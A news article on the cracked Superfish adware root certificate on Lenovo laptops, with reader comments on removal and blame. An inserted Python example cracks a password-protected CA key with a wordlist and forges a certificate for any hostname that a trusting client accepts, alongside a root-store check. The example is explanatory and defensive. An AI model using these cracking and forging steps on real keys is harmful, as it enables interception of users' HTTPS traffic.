Lenovo's Superfish adware cracked with relative ease, exposing users to attacks

This story just keeps getting worse for Lenovo. After being called out for injecting additional ads into users' browsing and claiming to have disabled the software and stopped installing it, Lenovo's "Superfish" adware has now had the private key behind its root certificate extracted by security researchers. Worse, it was evidently easy to do. The end result is that affected Lenovo users, and there are potentially hundreds of thousands of them, could see their computers needlessly exposed to attack.

Per security researcher Rob Graham of Errata Security:

"I extracted the certificate from the SuperFish adware and cracked the password ("komodia") that encrypted it. […] The consequence is that I can intercept the encrypted communications of SuperFish's victims (people with Lenovo laptops) while hanging out near them at a cafe wifi hotspot."


The worst part is that the password was recovered with a run-of-the-mill dictionary attack: try each word from a wordlist as the password until the private key decrypts. By Graham's account that took about 10 seconds. Because every affected Lenovo machine trusts the same Superfish root certificate, and the same private key ships with every copy of the adware, anyone holding that key can sign a certificate for any website and run "man-in-the-middle" interception against any user with Superfish installed. The only other requirement is a position on the network path, such as the same Wi-Fi hotspot.

What's frightening about this sort of attack is that it defeats exactly the protection HTTPS is meant to give: the browser shows a valid, padlocked connection to, say, your bank, while the attacker in the middle has access to everything you send and receive. The attacker can simply record it, or can actually alter what you're downloading or uploading, all without your knowledge. Uninstalling the Superfish application alone is not enough; the Superfish root certificate must also be deleted from the Windows trusted root store, or the machine keeps trusting certificates signed with the leaked key.
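The flaw described above, as an added example that is not part of the article and not Superfish's own code: a constructed self-signed root CA stands in for the Superfish certificate, its private key is shipped protected only by a password, a dictionary attack recovers that password, and a certificate for an arbitrary hostname signed with the recovered key passes the check a client trusting that root would make. The last function is the root-store check several commenters below ask for; it accepts the tuples `ssl.enum_certificates("ROOT")` returns on Windows. The wordlist, the hostname and the "Superfish, Inc." subject are constructed here; "komodia" is the password Graham actually recovered. Requires the third-party `cryptography` package.

```python
# Added example, not code from the article or from Superfish; needs the `cryptography` package.
import datetime
import ssl
import sys

from cryptography import x509
from cryptography.exceptions import InvalidSignature
from cryptography.hazmat.primitives import hashes, serialization
from cryptography.hazmat.primitives.asymmetric import padding, rsa
from cryptography.x509.oid import NameOID

# Constructed wordlist standing in for a dictionary file; "komodia" is the real password.
WORDLIST = [b"password", b"lenovo", b"123456", b"superfish", b"komodia", b"adware"]


def _builder(subject_cn, issuer_name, public_key, days):
    """Common certificate skeleton; the caller adds extensions and signs."""
    now = datetime.datetime.now(datetime.timezone.utc)
    return (
        x509.CertificateBuilder()
        .subject_name(x509.Name([x509.NameAttribute(NameOID.COMMON_NAME, subject_cn)]))
        .issuer_name(issuer_name)
        .public_key(public_key)
        .serial_number(x509.random_serial_number())
        .not_valid_before(now - datetime.timedelta(days=1))
        .not_valid_after(now + datetime.timedelta(days=days))
    )

def make_root_ca(common_name):
    """Self-signed CA like the one Superfish added to the Windows root store."""
    key = rsa.generate_private_key(public_exponent=65537, key_size=2048)
    name = x509.Name([x509.NameAttribute(NameOID.COMMON_NAME, common_name)])
    cert = _builder(common_name, name, key.public_key(), 3650).add_extension(
        x509.BasicConstraints(ca=True, path_length=None), critical=True).sign(key, hashes.SHA256())
    return key, cert

def ship_encrypted_key(key, password):
    """The design flaw: the CA key ships with every install, guarded only by a password."""
    return key.private_bytes(serialization.Encoding.PEM, serialization.PrivateFormat.PKCS8,
                             serialization.BestAvailableEncryption(password))

def dictionary_attack(encrypted_pem, wordlist):
    """Try each candidate as the key's password; a wrong one raises ValueError."""
    for word in wordlist:
        try:
            return word, serialization.load_pem_private_key(encrypted_pem, password=word)
        except (ValueError, TypeError):
            continue
    return None, None

def forge_leaf(signing_key, ca_cert, hostname):
    """Mint a certificate for any hostname that names ca_cert as its issuer."""
    leaf_key = rsa.generate_private_key(public_exponent=65537, key_size=2048)
    return _builder(hostname, ca_cert.subject, leaf_key.public_key(), 90).add_extension(
        x509.SubjectAlternativeName([x509.DNSName(hostname)]), critical=False
    ).sign(signing_key, hashes.SHA256())

def trusted_by(ca_cert, leaf):
    """What a client that trusts ca_cert checks: issuer name and signature."""
    if leaf.issuer != ca_cert.subject:
        return False
    try:
        ca_cert.public_key().verify(leaf.signature, leaf.tbs_certificate_bytes,
                                    padding.PKCS1v15(), leaf.signature_hash_algorithm)
    except InvalidSignature:
        return False
    return True

def suspect_roots(store_entries, needle="superfish"):
    """Scan (der, encoding, trust) tuples as ssl.enum_certificates("ROOT") returns them."""
    hits = []
    for der, encoding, _trust in store_entries:
        if encoding != "x509_asn":
            continue
        subject = x509.load_der_x509_certificate(der).subject.rfc4514_string()
        if needle in subject.lower():
            hits.append(subject)
    return hits

def demo():
    ca_key, ca_cert = make_root_ca("Superfish, Inc.")
    shipped = ship_encrypted_key(ca_key, b"komodia")
    password, recovered = dictionary_attack(shipped, WORDLIST)
    forged = forge_leaf(recovered, ca_cert, "www.example.com")
    # Same issuer name but a stranger's signing key: rejected. The leaked key is the damage.
    stranger = forge_leaf(rsa.generate_private_key(65537, 2048), ca_cert, "www.example.com")
    fake_store = [(ca_cert.public_bytes(serialization.Encoding.DER), "x509_asn", True)]
    return {"password": password,
            "forged_trusted": trusted_by(ca_cert, forged),
            "stranger_trusted": trusted_by(ca_cert, stranger),
            "root_store_hits": suspect_roots(fake_store)}

if __name__ == "__main__":
    print(demo())
    if sys.platform == "win32":  # the real check on an affected laptop
        print(suspect_roots(ssl.enum_certificates("ROOT")))
```

`trusted_by` deliberately does only what matters for the point here (issuer match and signature over the to-be-signed bytes); a real client also checks validity dates, name constraints and the SAN against the hostname, but none of those would save a victim whose root store holds the Superfish certificate, because the forged leaf satisfies them all.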

Source: Errata Security; Via: The Verge

Derek Kessler is Special Projects Manager for Mobile Nations. He's been writing about tech since 2009, has far more phones than is considered humane, still carries a torch for Palm, and got a Tesla because it was the biggest gadget he could find. You can follow him on Twitter at @derekakessler.

57 Comments
  • How can you remove superfish from your laptop?
  • Look for a suspicious program or folder
  • Flash the OS with a new OS, not the recovery disk. Although Lenovo are saying the malware should now be nonresponsive.
    What I do is take out the SSD/HDD and use my own.
  • Does this mean we should also question using Lenovo's SHAREit software?
  • You should question anything that comes preinstalled on a new laptop. You buy a laptop, you wipe the hard drive, install with your own disc/usb.
  • It appears to be an addon in the browser. So, you can disable it by managing the addons in the settings. You can check the installed programs to see if you can uninstall it from there. The big issue is the security certificate. You can remove it manually, though, by pressing Windows key + R on your keyboard to bring up the Run tool, then search for certmgr.msc to open your PC's certificate manager. Once open, click "Trusted root certificate authorities" in the navigation pane on the left and double-click "Certificates" in the central pane. You'll now see a list of trusted root certificates. Locate Superfish, and then right click and press Delete.
  • Shouldn't it be removable from "Add or Remove Programs?"
  • There appear to be a couple of new software programs that will tell you if its installed...
  • Also from Internet Option, go to Content > Certificates and look for Superfish's certificate and delete it.
  • http://arstechnica.com/security/2015/02/how-to-remove-the-superfish-malw...
  • A really bad day for them
  • This is sad.. Thank god I'm not a Lenovo fan.. I feel like Lenovo customers should sue the company for installing an adware without their knowledge
  • I was going to buy a Yoga 3 shortly but I hate adware so much I am going to go for another brand now.
  • Get the surface dude
  • Seriously, grab the Surface. It's a dream to use.
  • Buy the Signature Edition through the Microsoft Store. This is why Windows has a bad reputation. The OEMs have trashed the Windows ecosystem. Windows has been stable for years, but it still has a bad rep because of the bad drivers and software the OEMs installed. Microsoft got control of the drivers by starting to certify them. The OEMs started making better PCs after Microsoft released the Surface. Now Microsoft has to get the OEMs to release Signature Edition PCs at other retailers.
  • So essentially they could make it so you download illegal stuff without your consent and then get you incarcerated for it despite it being a hacker, not you, that did it?
  • In theory, yes. Though that'd be a really vindictive hacker. Not to mention you'd probably be able to prove that that's something you didn't do. What's more likely to happen is interception of account info or even changing something like which account you're transferring money to on your bank's website.
  • Yup. Though going to certain sites can do that. Think I read something recently about sites being hijacked - using the cookies to install junk. Good grief. Between this rubbish and the stuff certain agencies PUT DIRECTLY ON THE BALLY HARD DRIVES now more than ever we should have the ability to change the hdd and ram. Humph.
  • I mean, technically yes, but you should be far more concerned with your personal info being stolen than someone redirecting your traffic to pirate something...
  • Use Firefox and you're safe from this rubbish. Firefox FTW, once again.
  • Please, inform yourself: http://arstechnica.com/security/2015/02/how-to-remove-the-superfish-malw...
  • I am glad i don't use lenovo
  • That's really frightening. Wondering how much $$$$ the Chinese company was paid by Google for installing the adware aka spyware. Wondering if the same shit is on Lenovo Android devices also.
  • Wait, how is this Google's fault now? 
  • Everything related to spying has to do with Google
  • Disclaimer: I can't tell if you're being sarcastic; if you were, then please take my comment as sarcasm. Oh, ok. Let me see if I understand this correctly... So, at no time in human history was there such a thing as spying until Google came along. OR there was spying before Google, but now that Google came along and has a business model based on data collection of their customers (which Microsoft also does to an extent, by the way, and REALLY wishes that Bing gets as popular or more than Google.com so they too can collect data from their customers to *gasp* sell ads) for sale of ads, they suddenly own the whole concept of spying, so anything that remotely resembles spying MUST be attributed to Google. Am I close? Just trying to understand how one comes to the conclusion that Starfish is somehow, someway, Google's fault. Or do we all hate Google and anything bad is just... *sigh*... Google's fault? Sorry, I get tired of seeing people be so irrational because they either love or hate some company. It's the same thing when people go around bashing Microsoft, or as they write it, "Micro$soft", as if a company is somehow bad because their goal is to make money.
  • I mean, Google may have nothing to do with it, but in all honesty their name is synonymous with the word "ads". And they've been known to sneak into their users' email accounts to present more "suitable ads" for them. Microsoft is nothing like that. Other than that, you can clearly see his name... no_android. I mean, I agree with his name, but he is a hater to an extent, so don't expect much out of his comments.
  • Yes, I hate Android and Google's policies on ads and user privacy. 1. I hate Android 'coz it comes preinstalled with bloatware or some other stuff which enables hackers to gain access / helps Google to inject ads into my smartphone. 2. I hate Google's policies on ads 'coz they are very annoying, I mean literally annoying. WTH, ads in YouTube videos too?? 3. I hate the way Google takes user privacy. Do you people understand what is meant by PRIVACY? I didn't sign up to Gmail so that Google can read my email content all the time, every time. I hope you understood why I hate Google.
  • Dude, the fact that you hate Google was never in dispute, nor was I trying to change your mind. Please, go on hating Google; many people do. I was just wondering how you connected Google to Superfish, like genuinely wondering. I mean, if you order a meal at a restaurant and it comes out undercooked, do you blame Google??? Global warming is an issue? Google! Got dumped by your girlfriend? Google! My point is, if you have some context to your hate of Google instead of randomly injecting jibes at them at any random issue, people might take your point of view more seriously instead of just seeing you as some jaded lover. Last point is that if you hate having your privacy violated, then you should add to your screen name no_android_google_or_facebook, because Facebook has so much info about your personal life that it actually makes Google green with envy.
  • Even the name "Superfish" screams malware.
  • I uninstalled all the bloatware I could find on my new Lenovo. Is there an easy way to check if superfish is still intercepting my browsing?
  • I dodged a bullet by buying a different laptop, apparently.
  • This thing is super fishy.
  • http://i0.kym-cdn.com/photos/images/original/000/000/681/what-you-did-th...
  • I wonder how much Lenovo's share price will fall today lol...
  • Hahaha
  • All laptops should be Signature Editions. Bloatware should be illegal.
  • I was under the impression this was on consumer laptops, not Thinkpads.  Can you clarify?  If it's not on the business line you should change out that Thinkpad picture.
  • Superfish could be installed on ThinkPads sold through retail channels, but not those sold directly to businesses.
  • Lenovo should immediately issue an update to remove Superfish. The problem is that many users don't install manufacturer-issued updates. Superfish demonstrates the weakness of PC security on Windows machines. This kind of software should automatically be cleaned from affected PCs. No wonder so many people use Macs.
  • This has absolutely zero to do with Windows, and such a program could just as easily be coded and made operational on an OSX machine or Linux box. The only thing you could say is that Apple isn't likely to preinstall such software on their machines, but then again, not many companies do, Lenovo excluded.
  • We will continue buying Lenovo kit for the office but have always had a policy of wiping the drive and loading a standard image.
  • Do you trust their bios code which you cannot overwrite?
  • Why anyone would purchase a laptop with bloatware is beyond me.
  • Because all that bloatware makes 'em cheaper. Most people don't or can't spend an arm and a leg for a laptop. Price is important and in order to bring the price down, we get Bloatware, adware, etc.
  • Love the Chinese, huh? Actually this is exactly one of the reasons I moved entirely to Apple about 10 years ago. Windows Phone and Apple politics is what is bringing me back. But this stuff is not helping.
  • Solution? Simple, don't buy Lenovo!
  • I wish I'd known about the 'Signature Edition' when we purchased my son his Lenovo Y50. Nice computer, but man, never again! Is the real fix ultimately to buy 8.1 and install it myself?
  • In the meantime, browse with Firefox. It is immune to all this stuff.
  • Stop spreading misinformation! There's a section for Firefox: http://arstechnica.com/security/2015/02/how-to-remove-the-superfish-malw...
  • Ouch. Hopefully this will force Lenovo to permanently disable Superfish. This recently happened with the Samsung smart TVs, and the carrier supercookies. I wonder when OEMs and others will realize further monetization of personal products leads to privacy and security concerns. Probably not for a while. Posted via Galaxy Tab 4
  • Why are you using a Thinkpad picture if it's affected by the malware?
  • It's malware, not adware!
  • Ok, what are ads? :|
  • Users can't afford such kind of security threats.
  • Sounds like it's not just a Lenovo problem now. Superfish vulnerability traced to other apps, too: http://www.pcworld.com/article/2887253/superfish-vulnerability-traced-to... Here is a list of other vendors affected. Vulnerability Note VU#529496: http://www.kb.cert.org/vuls/id/529496